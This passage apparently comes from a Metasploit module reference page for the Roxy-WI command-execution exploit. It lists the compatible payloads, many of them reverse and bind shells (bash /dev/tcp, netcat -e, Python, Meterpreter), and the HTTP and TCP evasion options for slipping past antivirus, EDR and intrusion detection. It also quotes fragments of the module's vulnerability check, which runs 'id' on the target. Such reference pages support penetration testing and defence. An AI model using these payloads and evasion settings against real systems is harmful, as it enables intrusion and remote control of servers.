   20  payload/cmd/unix/python/meterpreter/bind_tcp_uuid                      normal  No     Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support
   21  payload/cmd/unix/python/meterpreter/reverse_http                       normal  No     Python Exec, Python Meterpreter, Python Reverse HTTP Stager
   22  payload/cmd/unix/python/meterpreter/reverse_https                      normal  No     Python Exec, Python Meterpreter, Python Reverse HTTPS Stager
   23  payload/cmd/unix/python/meterpreter/reverse_tcp                        normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager
   24  payload/cmd/unix/python/meterpreter/reverse_tcp_ssl                    normal  No     Python Exec, Python Meterpreter, Python Reverse TCP SSL Stager
   25  payload/cmd/unix/python/meterpreter/reverse_tcp_uuid                   normal  No     Python Exec, Python Meterpreter, Python Reverse TCP Stager with UUID Support
   26  payload/cmd/unix/python/meterpreter_bind_tcp                           normal  No     Python Exec, Python Meterpreter Shell, Bind TCP Inline
   27  payload/cmd/unix/python/meterpreter_reverse_http                       normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTP Inline
   28  payload/cmd/unix/python/meterpreter_reverse_https                      normal  No     Python Exec, Python Meterpreter Shell, Reverse HTTPS Inline
   29  payload/cmd/unix/python/meterpreter_reverse_tcp                        normal  No     Python Exec, Python Meterpreter Shell, Reverse TCP Inline
   30  payload/cmd/unix/python/pingback_bind_tcp                              normal  No     Python Exec, Python Pingback, Bind TCP (via python)
   31  payload/cmd/unix/python/pingback_reverse_tcp                           normal  No     Python Exec, Python Pingback, Reverse TCP (via python)
   32  payload/cmd/unix/python/shell_bind_tcp                                 normal  No     Python Exec, Command Shell, Bind TCP (via python)
   33  payload/cmd/unix/python/shell_reverse_tcp                              normal  No     Python Exec, Command Shell, Reverse TCP (via python)
   34  payload/cmd/unix/python/shell_reverse_tcp_ssl                          normal  No     Python Exec, Command Shell, Reverse TCP SSL (via python)
   35  payload/cmd/unix/python/shell_reverse_udp                              normal  No     Python Exec, Command Shell, Reverse UDP (via python)
   36  payload/cmd/unix/reverse                                               normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   37  payload/cmd/unix/reverse_awk                                           normal  No     Unix Command Shell, Reverse TCP (via AWK)
   38  payload/cmd/unix/reverse_bash                                          normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   39  payload/cmd/unix/reverse_bash_telnet_ssl                               normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   40  payload/cmd/unix/reverse_bash_udp                                      normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   41  payload/cmd/unix/reverse_jjs                                           normal  No     Unix Command Shell, Reverse TCP (via jjs)
   42  payload/cmd/unix/reverse_ksh                                           normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   43  payload/cmd/unix/reverse_lua                                           normal  No     Unix Command Shell, Reverse TCP (via Lua)
   44  payload/cmd/unix/reverse_ncat_ssl                                      normal  No     Unix Command Shell, Reverse TCP (via ncat)
   45  payload/cmd/unix/reverse_netcat                                        normal  No     Unix Command Shell, Reverse TCP (via netcat)
   46  payload/cmd/unix/reverse_netcat_gaping                                 normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   47  payload/cmd/unix/reverse_nodejs                                        normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   48  payload/cmd/unix/reverse_openssl                                       normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   49  payload/cmd/unix/reverse_perl                                          normal  No     Unix Command Shell, Reverse TCP (via Perl)
   50  payload/cmd/unix/reverse_perl_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   51  payload/cmd/unix/reverse_php_ssl                                       normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   52  payload/cmd/unix/reverse_python                                        normal  No     Unix Command Shell, Reverse TCP (via Python)
   53  payload/cmd/unix/reverse_python_ssl                                    normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   54  payload/cmd/unix/reverse_r                                             normal  No     Unix Command Shell, Reverse TCP (via R)
   55  payload/cmd/unix/reverse_ruby                                          normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   56  payload/cmd/unix/reverse_ruby_ssl                                      normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   57  payload/cmd/unix/reverse_socat_udp                                     normal  No     Unix Command Shell, Reverse UDP (via socat)
   58  payload/cmd/unix/reverse_ssh                                           normal  No     Unix Command Shell, Reverse TCP SSH
   59  payload/cmd/unix/reverse_ssl_double_telnet                             normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   60  payload/cmd/unix/reverse_stub                                          normal  No     Unix Command Shell, Reverse TCP (stub)
   61  payload/cmd/unix/reverse_tclsh                                         normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   62  payload/cmd/unix/reverse_zsh                                           normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   63  payload/generic/custom                                                 normal  No     Custom Payload
   64  payload/generic/shell_bind_tcp                                         normal  No     Generic Command Shell, Bind TCP Inline
   65  payload/generic/shell_reverse_tcp                                      normal  No     Generic Command Shell, Reverse TCP Inline
   66  payload/generic/ssh/interact                                           normal  No     Interact with Established SSH Connection

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/roxy_wi_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/roxy_wi_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, defl
                                                            ate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apac
                                                            he)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apa
                                                            che)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::shuffle_get_params      false            no        Randomize order of GET parameters
   HTTP::shuffle_post_params     false            no        Randomize order of POST parameters
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all,
                                                            u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Didn't receive a response from <PEER>


Here is a relevant code snippet related to the "Didn't receive a response from <PEER>" error message:

95:	  def check
96:	    print_status("Checking if #{peer} is vulnerable!")
97:	
98:	    res = execute_command('id')
99:	
100:	    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
101:	
102:	    if res.code == 200 && res.body =~ /uid=\d+\(.+\)/
103:	      print_status("#{peer} is vulnerable!")
104:	      return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.')
105:	    elsif res.code == 200

The device responded to exploitation with a 200 OK and test command successfully executed.


Here is a relevant code snippet related to the "The device responded to exploitation with a 200 OK and test command successfully executed." error message:

99:	
100:	    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
101:	
102:	    if res.code == 200 && res.body =~ /uid=\d+\(.+\)/
103:	      print_status("#{peer} is vulnerable!")
104:	      return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.')
105:	    elsif res.code == 200
106:	      return CheckCode::Unknown('The target did respond 200 OK response however it did not contain the expected payload.')
107:	    else
108:	      return CheckCode::Safe("The #{peer} did not respond a 200 OK response and the expected response, meaning its not vulnerable.")
109:	    end

The target did respond 200 OK response however it did not contain the expected payload.


Here is a relevant code snippet related to the "The target did respond 200 OK response however it did not contain the expected payload." error message:

101:	
102:	    if res.code == 200 && res.body =~ /uid=\d+\(.+\)/
103:	      print_status("#{peer} is vulnerable!")
104:	      return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.')
105:	    elsif res.code == 200
106:	      return CheckCode::Unknown('The target did respond 200 OK response however it did not contain the expected payload.')
107:	    else
108:	      return CheckCode::Safe("The #{peer} did not respond a 200 OK response and the expected response, meaning its not vulnerable.")
109:	    end
110:	  end
111:	

The <PEER> did not respond a 200 OK response and the expected response, meaning its not vulnerable.


Here is a relevant code snippet related to the "The <PEER> did not respond a 200 OK response and the expected response, meaning its not vulnerable." error message:

103:	      print_status("#{peer} is vulnerable!")
104:	      return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.')
105:	    elsif res.code == 200
106:	      return CheckCode::Unknown('The target did respond 200 OK response however it did not contain the expected payload.')
107:	    else
108:	      return CheckCode::Safe("The #{peer} did not respond a 200 OK response and the expected response, meaning its not vulnerable.")
109:	    end
110:	  end
111:	
112:	  def exploit
113:	    print_status('Exploiting...')

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Nuri Çilengir <nuri[at]prodaft.com>

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.